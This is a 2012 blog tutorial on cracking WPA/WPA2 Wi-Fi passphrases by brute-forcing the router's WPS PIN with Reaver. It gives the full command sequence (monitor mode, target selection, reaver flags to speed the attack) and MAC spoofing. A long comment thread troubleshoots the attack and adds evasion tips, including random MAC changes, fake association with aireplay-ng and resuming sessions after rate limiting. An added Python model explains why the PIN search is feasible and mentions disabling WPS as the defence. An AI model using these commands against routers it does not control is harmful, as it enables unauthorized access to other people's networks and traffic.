Saturday, December 29, 2012

How to Crack a Wi-Fi Network’s WPA Password with Reaver

A new, free, open-source tool called Reaver exploits a security hole in wireless routers and can crack most routers' current passwords with relative ease. Here's how to crack a WPA or WPA2 password, step by step, with Reaver—and how to protect your network against Reaver attacks.

On average Reaver will recover the target AP's plain text WPA/WPA2 passphrase in 4-10 hours, depending on the AP. In practice, it will generally take half this time to guess the correct WPS pin and recover the passphrase.

What You'll Need

- A PC running Linux.
- A computer with a Wi-Fi adapter.

Run the following commands in the terminal. Commands are shown in bold and prefixed with #; type them without the #.

Step 1: Install the Airmon-ng suite (part of aircrack-ng), as described in my previous post.

Step 2: Install Reaver, as described in my previous post.

Step 3: To get root privileges, in terminal type:

# sudo -s

Step 4: Find your wireless card. In the terminal, type:

# iwconfig

Step 5: Put your wireless card into monitor mode. Assuming your wireless card's interface name is wlan0, execute the following command:

# airmon-ng start wlan0

Step 6: In the terminal, type:

# airodump-ng mon0

It will display a list of wireless networks in range. When you see the network you want to crack, press Ctrl+C to stop the list from refreshing, then copy that network's BSSID (MAC address of the targeted network). The network should have WPA or WPA2 listed under the ENC column.

Step 7: Now start cracking the password with Reaver:

# reaver -i <monitor interface> -b <BSSID> -vv

For example, if your monitor interface is mon0, like mine, and your BSSID is 7F:AC:6B:MB:1F:B2 (a BSSID I just made up; a real one contains only the hex digits 0-9 and A-F), your command would look like:

# reaver -i mon0 -b 7F:AC:6B:MB:1F:B2 -vv

Now sit back and relax while Reaver tries a series of PINs on the router in a brute force attack. The Reaver documentation says it can take between 4 and 10 hours.

Speeding Up the Attack

By default, Reaver waits 1 second between PIN attempts. You can disable this delay by adding '-d 0' on the command line, but some APs may not like it:

# reaver -i mon0 -b 00:01:02:03:04:05 -vv -d 0

Another option that can speed up an attack is --dh-small. This option instructs Reaver to use small Diffie-Hellman secret numbers in order to reduce the computational load on the target AP:

# reaver -i mon0 -b 00:01:02:03:04:05 -vv --dh-small
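To see why the PIN search above finishes in hours rather than years, and what the 1 second delay actually buys, here is an added Python model; it is not part of the original post or of Reaver. It relies on two facts from the WPS specification (the 8th PIN digit is a checksum of the first 7, and the registrar exchange confirms the first and second halves of the PIN in separate steps); the per-exchange time is a constructed assumption.

```python
"""WPS PIN risk model (added example; not from the original post or Reaver).

Facts from the WPS specification: a PIN is 8 decimal digits, the 8th digit
is a checksum of the first 7, and the registrar protocol acknowledges the
first 4 digits and the last 4 digits in separate steps, so each half can be
confirmed on its own. The timing numbers below are constructed assumptions.
"""


def wps_checksum(first7: int) -> int:
    """Checksum digit for the first 7 digits of a WPS PIN: alternating
    weights 3 and 1 from the right, summed mod 10."""
    accum = 0
    while first7:
        accum += 3 * (first7 % 10)
        first7 //= 10
        accum += first7 % 10
        first7 //= 10
    return (10 - accum % 10) % 10


def wps_pin_valid(pin: int) -> bool:
    """True if the 8-digit PIN carries the correct checksum digit."""
    return 0 <= pin <= 99_999_999 and pin % 10 == wps_checksum(pin // 10)


def pin_attempts(checksum_enforced: bool = True) -> int:
    """Worst-case number of guesses when the halves are confirmed separately:
    10^4 for the first half, then 10^3 for the second half (10^4 if the AP
    does not enforce the checksum digit)."""
    return 10**4 + (10**3 if checksum_enforced else 10**4)


def naive_attempts() -> int:
    """Worst case if the whole PIN had to be guessed at once: 10^8 PINs,
    one in ten of which has a valid checksum."""
    return 10**8 // 10


def attack_hours(attempts: int, delay_s: float = 1.0, exchange_s: float = 1.0):
    """Return (worst_case_hours, average_hours) for `attempts` guesses.
    delay_s is Reaver's inter-PIN delay (1 s by default, 0 with -d 0);
    exchange_s is an assumed duration of one WPS exchange with the AP."""
    worst = attempts * (delay_s + exchange_s) / 3600
    return worst, worst / 2


if __name__ == "__main__":
    # Reaver's first guess, 12345670, is a checksum-valid PIN.
    print("12345670 valid:", wps_pin_valid(12345670))
    print("split halves:  ", pin_attempts(), "guesses ->",
          "%.1f h worst, %.1f h avg" % attack_hours(pin_attempts()))
    print("with -d 0:     ", "%.1f h worst" % attack_hours(pin_attempts(), delay_s=0)[0])
    print("whole PIN:     ", naive_attempts(), "guesses ->",
          "%.0f h worst" % attack_hours(naive_attempts())[0])
    # Mitigation: neither a longer WPA passphrase nor the 1 s delay changes
    # the picture, because the AP hands over the passphrase once the PIN is
    # right. Disabling WPS on the AP removes the PIN exchange entirely.
```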

MAC Spoofing

In some cases you may want or need to spoof your MAC address. Reaver supports MAC spoofing with the --mac option, but you must ensure that you have spoofed your MAC correctly for it to work.
Changing the MAC address of the virtual monitor mode interface (typically named mon0) WILL NOT WORK. You must change the MAC address of your wireless card's physical interface. For example:

# ifconfig wlan0 down
# ifconfig wlan0 hw ether 00:BA:AD:BE:EF:69
# ifconfig wlan0 up
# airmon-ng start wlan0
# reaver -i mon0 -b 00:01:02:03:04:05 -vv --mac=00:BA:AD:BE:EF:69

If you encounter any problems, post a comment below or visit the Reaver website.

43 comments:

  1. it's just repeating
    [+] Switching mon0 to channel 14
    [+] Switching mon0 to channel 1
    [+] Switching mon0 to channel 2
    [+] Switching mon0 to channel 3
    [+] Switching mon0 to channel 4
    [+] Switching mon0 to channel 5
    [+] Switching mon0 to channel 6
    [+] Switching mon0 to channel 9
    [+] Switching mon0 to channel 7
    [+] Switching mon0 to channel 8
    [+] Switching mon0 to channel 9
    [+] Switching mon0 to channel 10
    [+] Switching mon0 to channel 11
    [+] Switching mon0 to channel 12
    [+] Switching mon0 to channel 13
    [+] Switching mon0 to channel 14

    Kindly help. Mine is Ubuntu 12.04

    Replies
    1. you should turn on your monitor interface... then lock the channel by typing airodump-ng (monitor interface) -c (channel) before executing reaver.

    2. I have tried this
      airodump-ng mon0 -c 1 // 1 for channel 1
      but still it keeps on changing the channels.
      please reply asap

    3. I have the same problem, it keeps on changing the channels. I tried airodump-ng mon0 -c 1 but it didn't help. Kindly help me to overcome this issue.
      Regards

    4. You need to lock the channel for reaver, not airodump-ng. The -c switch works for reaver as well (eg -c 6). Use the channel number reported by airodump for the target BSSID.

  2. root@ceaser:~/aircrack-ng-1.1/reaver-1.4/src# airmon-ng start wlan0


    Found 5 processes that could cause trouble.
    If airodump-ng, aireplay-ng or airtun-ng stops working after
    a short period of time, you may want to kill (some of) them!
    -e
    PID Name
    938 NetworkManager
    948 avahi-daemon
    949 avahi-daemon
    2496 wpa_supplicant
    3466 dhclient


    Interface Chipset Driver

    eth1 Unknown wl - [phy0]

    root@ceaser:~/aircrack-ng-1.1/reaver-1.4/src# airodump-ng mon0
    Interface mon0:
    ioctl(SIOCGIFINDEX) failed: No such device
    root@ceaser:~/aircrack-ng-1.1/reaver-1.4/src# reaver -i moninterface -b bssid -vv

    Reaver v1.4 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner

    [-] Failed to retrieve a MAC address for interface 'moninterface'!
    root@ceaser:~/aircrack-ng-1.1/reaver-1.4/src# reaver -i moninterface -b bssid -vv

    Reaver v1.4 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner

    [-] Failed to retrieve a MAC address for interface 'moninterface'!
    root@ceaser:~/aircrack-ng-1.1/reaver-1.4/src#

    Replies
    1. you should type airmon-ng start eth1 because your machine doesn't have wlan0 interface, then execute the command airodump-ng mon0

    2. I used wlan0mon for my machine but later I got into some AP rate limiting... how do I get past that?? I'm very new to this.. like 10 h new))

  3. i get the error above when i try to start the attack service above

  4. ubuntu went to text console 10 sec after I typed in iwconfig. Panic occurred my ass-

  5. after i type airodump-ng start wlan0

    Found 5 processes that could cause trouble.
    If airodump-ng, aireplay-ng or airtun-ng stops working after
    a short period of time, you may want to kill (some of) them!
    -e
    PID Name
    426 avahi-daemon
    427 avahi-daemon
    465 NetworkManager
    554 wpa_supplicant
    2526 dhclient
    Process with PID 2526 (dhclient) is running on interface wlan0


    Interface Chipset Driver

    wlan0 Atheros ath5k - [phy0]

    ERROR: Neither the sysfs interface links nor the iw command is available.
    Please download and install iw from
    http://wireless.kernel.org/download/iw/iw-0.9.19.tar.bz2
    this happens, and when I go to the given site, the site does not exist

    Replies
    1. I had the same problem! What I did was download "Synaptic Package Manager" from the "Ubuntu Software Center", and once in that program, I looked for "iw" and told it to install that! It seems to be working now! :)

    2. Above comment worked for me as well. Nice one!

    3. correct! it's working

  6. Found 5 processes that could cause trouble.
    If airodump-ng, aireplay-ng or airtun-ng stops working after
    a short period of time, you may want to kill (some of) them!
    -e
    PID Name
    1491 avahi-daemon
    1492 avahi-daemon
    1938 NetworkManager
    1956 wpa_supplicant
    3568 dhclient
    Process with PID 3568 (dhclient) is running on interface wlan0


    Interface Chipset Driver

    wlan0 Atheros ath9k - [phy0]

    ERROR: Neither the sysfs interface links nor the iw command is available.
    Please download and install iw from
    http://wireless.kernel.org/download/iw/iw-0.9.19.tar.bz2


    root@ubuntu:~# airodump-ng mon0
    Interface mon0:
    ioctl(SIOCGIFINDEX) failed: No such device
    root@ubuntu:~#

  7. it says
    [!] WARNING: Failed to associate with 00:25:9C:0C:56:BE (ESSID: adamwdji)
    [!] WARNING: Failed to associate with 00:25:9C:0C:56:BE (ESSID: adamwdji)
    [!] WARNING: Failed to associate with 00:25:9C:0C:56:BE (ESSID: adamwdji)
    [!] WARNING: Failed to associate with 00:25:9C:0C:56:BE (ESSID: adamwdji)
    [!] WARNING: Failed to associate with 00:25:9C:0C:56:BE (ESSID: adamwdji)
    what shall I do???

    Replies
    1. same problem here. what shall we do?

    2. same problem here. Any help?

    3. same here !!!!

    4. Same here!!! I am new to Reaver or Kali Linux but had cracked wifi through a WPA handshake dictionary attack. Since Reaver seemed faster, I was trying Reaver with Kali Linux but got stuck at the above interface, and mine is eth1, not wlan0.

  8. This comment has been removed by the author.

  9. I just get this, and it looks like it starts over with the same pin:

    WPS transaction failed (code: 0x02), re-trying last pin

  10. After running the final command I get this

    [+] Waiting for beacon from 00:1F:90:CC:7D:B0
    [+] Switching mon0 to channel 1
    [+] Associated with 00:1F:90:CC:7D:B0 (ESSID: ZWT75)

    Should I be good to just wait now?

  11. alexandros@alexandros-HP-Compaq-dx2400-Microtower-PC:~$ sudo -s
    [sudo] password for alexandros:
    root@alexandros-HP-Compaq-dx2400-Microtower-PC:~# iwconfig
    wlan0 IEEE 802.11bgn ESSID:off/any
    Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
    Retry long limit:7 RTS thr:off Fragment thr:off
    Encryption key:off
    Power Management:off

    lo no wireless extensions.

    mon0 IEEE 802.11bgn Mode:Monitor Tx-Power=20 dBm
    Retry long limit:7 RTS thr:off Fragment thr:off
    Power Management:off

    mon1 IEEE 802.11bgn Mode:Monitor Tx-Power=20 dBm
    Retry long limit:7 RTS thr:off Fragment thr:off
    Power Management:off

    mon2 IEEE 802.11bgn Mode:Monitor Tx-Power=20 dBm
    Retry long limit:7 RTS thr:off Fragment thr:off
    Power Management:off

    eth0 no wireless extensions.

    root@alexandros-HP-Compaq-dx2400-Microtower-PC:~# airmon-ng start wlan0


    Found 4 processes that could cause trouble.
    If airodump-ng, aireplay-ng or airtun-ng stops working after
    a short period of time, you may want to kill (some of) them!
    -e
    PID Name
    867 avahi-daemon
    868 avahi-daemon
    911 NetworkManager
    1067 wpa_supplicant


    Interface Chipset Driver

    wlan0 Atheros ath9k - [phy0]
    (monitor mode enabled on mon3)
    mon0 Atheros ath9k - [phy0]
    mon1 Atheros ath9k - [phy0]
    mon2 Atheros ath9k - [phy0]

    root@alexandros-HP-Compaq-dx2400-Microtower-PC:~# airodump-ng mon3

    CH -1 ][ Elapsed: 8 s ][ 2014-04-04 17:42

    BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

    FC:75:16:85:14:B6 -1 0 4 0 133 -1 OPN
    00:15:56:B5:04:13 -58 76 0 0 6 54 . WPA TKIP PSK OTE8592
    54:E6:FC:CD:BA:FA -73 10 2 0 4 54 . WPA2 CCMP PSK homelink
    5C:D9:98:BB:BA:86 -89 86 37 0 6 54e WPA2 CCMP PSK Stefanatos

    BSSID STATION PWR Rate Lost Packets Probes

    FC:75:16:85:14:B6 E8:4E:06:05:50:F2 -92 0 - 1 33 10
    54:E6:FC:CD:BA:FA F8:D1:11:B3:61:21 -1 36 - 0 0 2
    5C:D9:98:BB:BA:86 00:D5:24:46:C6:08 -91 0e- 5e 0 39

    root@alexandros-HP-Compaq-dx2400-Microtower-PC:~# reaver -i mon3 -b 00:15:56:B5:04:13 -vv

    Reaver v1.4 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner

    [+] Waiting for beacon from 00:15:56:B5:04:13
    [+] Switching mon3 to channel 6
    [!] WARNING: Failed to associate with 00:15:56:B5:04:13 (ESSID: OTE8592)
    [!] WARNING: Failed to associate with 00:15:56:B5:04:13 (ESSID: OTE8592)
    [!] WARNING: Failed to associate with 00:15:56:B5:04:13 (ESSID: OTE8592)
    [!] WARNING: Failed to associate with 00:15:56:B5:04:13 (ESSID: OTE8592)
    [!] WARNING: Failed to associate with 00:15:56:B5:04:13 (ESSID: OTE8592)
    [!] WARNING: Failed to associate with 00:15:56:B5:04:13 (ESSID: OTE8592)
    what should i do?

  12. Hi, just my way of running reaver.

    What I do is:

    1. Use a live usb drive with Back Track 5, Press into your usb port.

    2. Start up your computer, as soon as you see the logo press F12 on mine yours might be F9 or something different.
    This is where you select a different boot method, so select your usb thumb drive, not your hard drive.

    3. On my Back Track Live Usb when booting it up you select the default option and press enter, then it runs a few lines of code and stops, this is when I hit the space bar and it will continue loading code then Ubuntu logo 10.10 then runs more code till it stops at a command prompt again, here you type: startx and press enter. Now wait until the operating system completes.

    4. Now single click second icon on the bottom left which is Konsole Terminal (command Prompt). Type: airmon-ng and press enter, this will show your interface usually wlan0 ( the 0 at the end is a zero or 1 etc.)
    Now type: airmon-ng start wlan0
    This puts your interface in monitor mode.
    Now type: killall -9 dhclient3 and press enter.

    5. Now to spoof mac address:

    Type: ifconfig wlan0 down and press enter.

    ifconfig mon0 down and press enter

    macchanger -r wlan0 and press enter ( the -r gives you a new random mac address)

    Now you have changed your wlan0 interface mac address, but now we are going to change the mon0 interface to the same mac address as the wlan0 mac address so type: macchanger -m 00:00:00:00:00:00 mon0 and press enter. ( the 00:00:00:00:00:00 is the mac which you type in from the wlan0 mac change)

    Now both your mac addresses should be the same, good, always match the two macs and you will have less troubles.

    6. Type: ifconfig wlan0 up and press enter.


    ifconfig mon0 up and press enter.


    Now type: clear and press enter to use same terminal window.

    7. Type: wash -i mon0 -C ( -C is capital which stops Bad FCS Skipping problems) let it scan till you find the ESSID you like which says "No" in the WPS Locked column, then press Ctrl and c keys together to stop scanning.
    Now double left click in front of BSSID mac address that you want, on the second click hold it down and drag to highlight the mac address then release and right click and select copy. Also remember the channel number from the Channel column.

    Now type: clear and press enter


    8. Type: airodump-ng mon0 and press enter. and let it scan for a while, double check that your BSSID is on the number that you are remembering if not then you need to remember the new channel number. Now if everything is good press Ctrl and c keys to stop scanning. Now type: clear and press enter.


    9. Now you are ready type airodump-ng -c (your channel number lets says 6) mon0 So it would be:

    airmon-ng -c 6 mon0 Now leave that terminal running. This sets your interface on the proper channel.

    10. Open a new terminal second icon in at left bottom of desktop.
    Type: aireplay-ng -1 33333333 -a 00:00:00:00:00:00 mon0 ( the 33333333 can only be 8 3's long and the 00:00:00:00:00:00 is the BSSID you copied so after the -a then space right click and select paste)

    Now as it runs you watch for acks in brackets and association successful [AID] then sending keep-alive packet [ack] then that's good, if you are getting (Open System) then you are too far away from the selected access point.


    Now start reaver, type: reaver -i mon0 -A -N -b 00:00:00:00:00:00 -vv ( -A and -N are capital 00:00:00:00:00:00 is your BSSID selected just right click and paste as before).


    11. now I move my computer around till I get M3's and M4's completing on the reaver terminal and movement on the aireplay-ng terminal.


    Also if you use just the -v instead of -vv at the end of the the reaver command you only see the pin numbers tried instead of all the pin attempts


    Well that's just what I do, so have fun.

  13. Also while in Back Track 5 single left click the 4th icon at the bottom left of the desktop which is Dolphin file manager. select root in left column then select usr/local/etc/reaver in the main window. Now after you have at least one pin change in reaver it creates a file in this location to save the session in. so this would be 000000000000.wpc (000000000000 would be the BSSID you selected). So if you save this file to a separate jump drive (not your live Back Track drive). then you save your session, so next time if you get rate limited you can wait till another time and just paste that file into the same folder again. when you start reaver again it will ask if you want to resume that session type y for yes and enter. As reaver works it updates that file, so just copy and paste the new updated file to your jump drive again.

  14. I am getting this error "mon0 is not a network interface". Please help me.

  15. Hi, I have one question. I have done access point mapping using airodump-ng, so I have collected so many APs with different encryption; some of them are open APs. Are there any tools or web services available for visualization?
    I found this website http://bit.ly/1Nbfgm6 but are there any other sources available?

    Thanks!

  16. Reaver has been running for 3 days... now says No space left on device what to do or just let it keep running??????

  17. Reaver always uses the same pin 12345670 when cracking

    [+] Waiting for beacon from 00:1E:2A:03:41:92
    [+] Switching mon0 to channel 1
    [+] Associated with 00:1E:2A:03:41:92 (ESSID: kacperek)
    [+] Trying pin 12345670
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [!] WARNING: Receive timeout occurred
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x02), re-trying last pin
    [+] Trying pin 12345670
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [!] WARNING: Receive timeout occurred
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x02), re-trying last pin
    [+] Trying pin 12345670
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [!] WARNING: Receive timeout occurred
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x02), re-trying last pin
    [+] Trying pin 12345670
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [!] WARNING: Receive timeout occurred
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x02), re-trying last pin
    [+] Trying pin 12345670
    ^C
    [+] Nothing done, nothing to save.

    Help please

  18. root@raspberrypi:~# iwconfig
    wlan0 unassociated Nickname:""
    Mode:Managed Frequency=2.412 GHz Access Point: Not-Associated
    Sensitivity:0/0
    Retry:off RTS thr:off Fragment thr:off
    Encryption key:off
    Power Management:off
    Link Quality:0 Signal level:0 Noise level:0
    Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
    Tx excessive retries:0 Invalid misc:0 Missed beacon:0

    lo no wireless extensions.

    eth0 no wireless extensions.

    root@raspberrypi:~# airmon-ng start wlan0


    Found 6 processes that could cause trouble.
    If airodump-ng, aireplay-ng or airtun-ng stops working after
    a short period of time, you may want to kill (some of) them!
    -e
    PID Name
    1667 ifplugd
    1677 ifplugd
    1699 ifplugd
    1741 wpa_supplicant
    1785 wpa_cli
    2005 dhclient


    Interface Chipset Driver


    root@raspberrypi:~# airodump-ng mon0
    Interface mon0:
    ioctl(SIOCGIFINDEX) failed: No such device
    root@raspberrypi:~# airmon-ng start eth1


    Found 6 processes that could cause trouble.
    If airodump-ng, aireplay-ng or airtun-ng stops working after
    a short period of time, you may want to kill (some of) them!
    -e
    PID Name
    1667 ifplugd
    1677 ifplugd
    1699 ifplugd
    1741 wpa_supplicant
    1785 wpa_cli
    2005 dhclient


    Interface Chipset Driver


    root@raspberrypi:~# airodump-ng mon0
    Interface mon0:
    ioctl(SIOCGIFINDEX) failed: No such device
    root@raspberrypi:~# airodump-ng mon0

    Help, please :D

  19. I get this, what's the solution?
    root@hani:~# airodump-ng mon0
    Interface mon0:
    ioctl(SIOCGIFINDEX) failed: No such device
    root@hani:~# airodump-ng mon0

  20. I am using Kali Linux 2016.1; when I type the reaver command it shows failed to retrieve mac address for wlan0
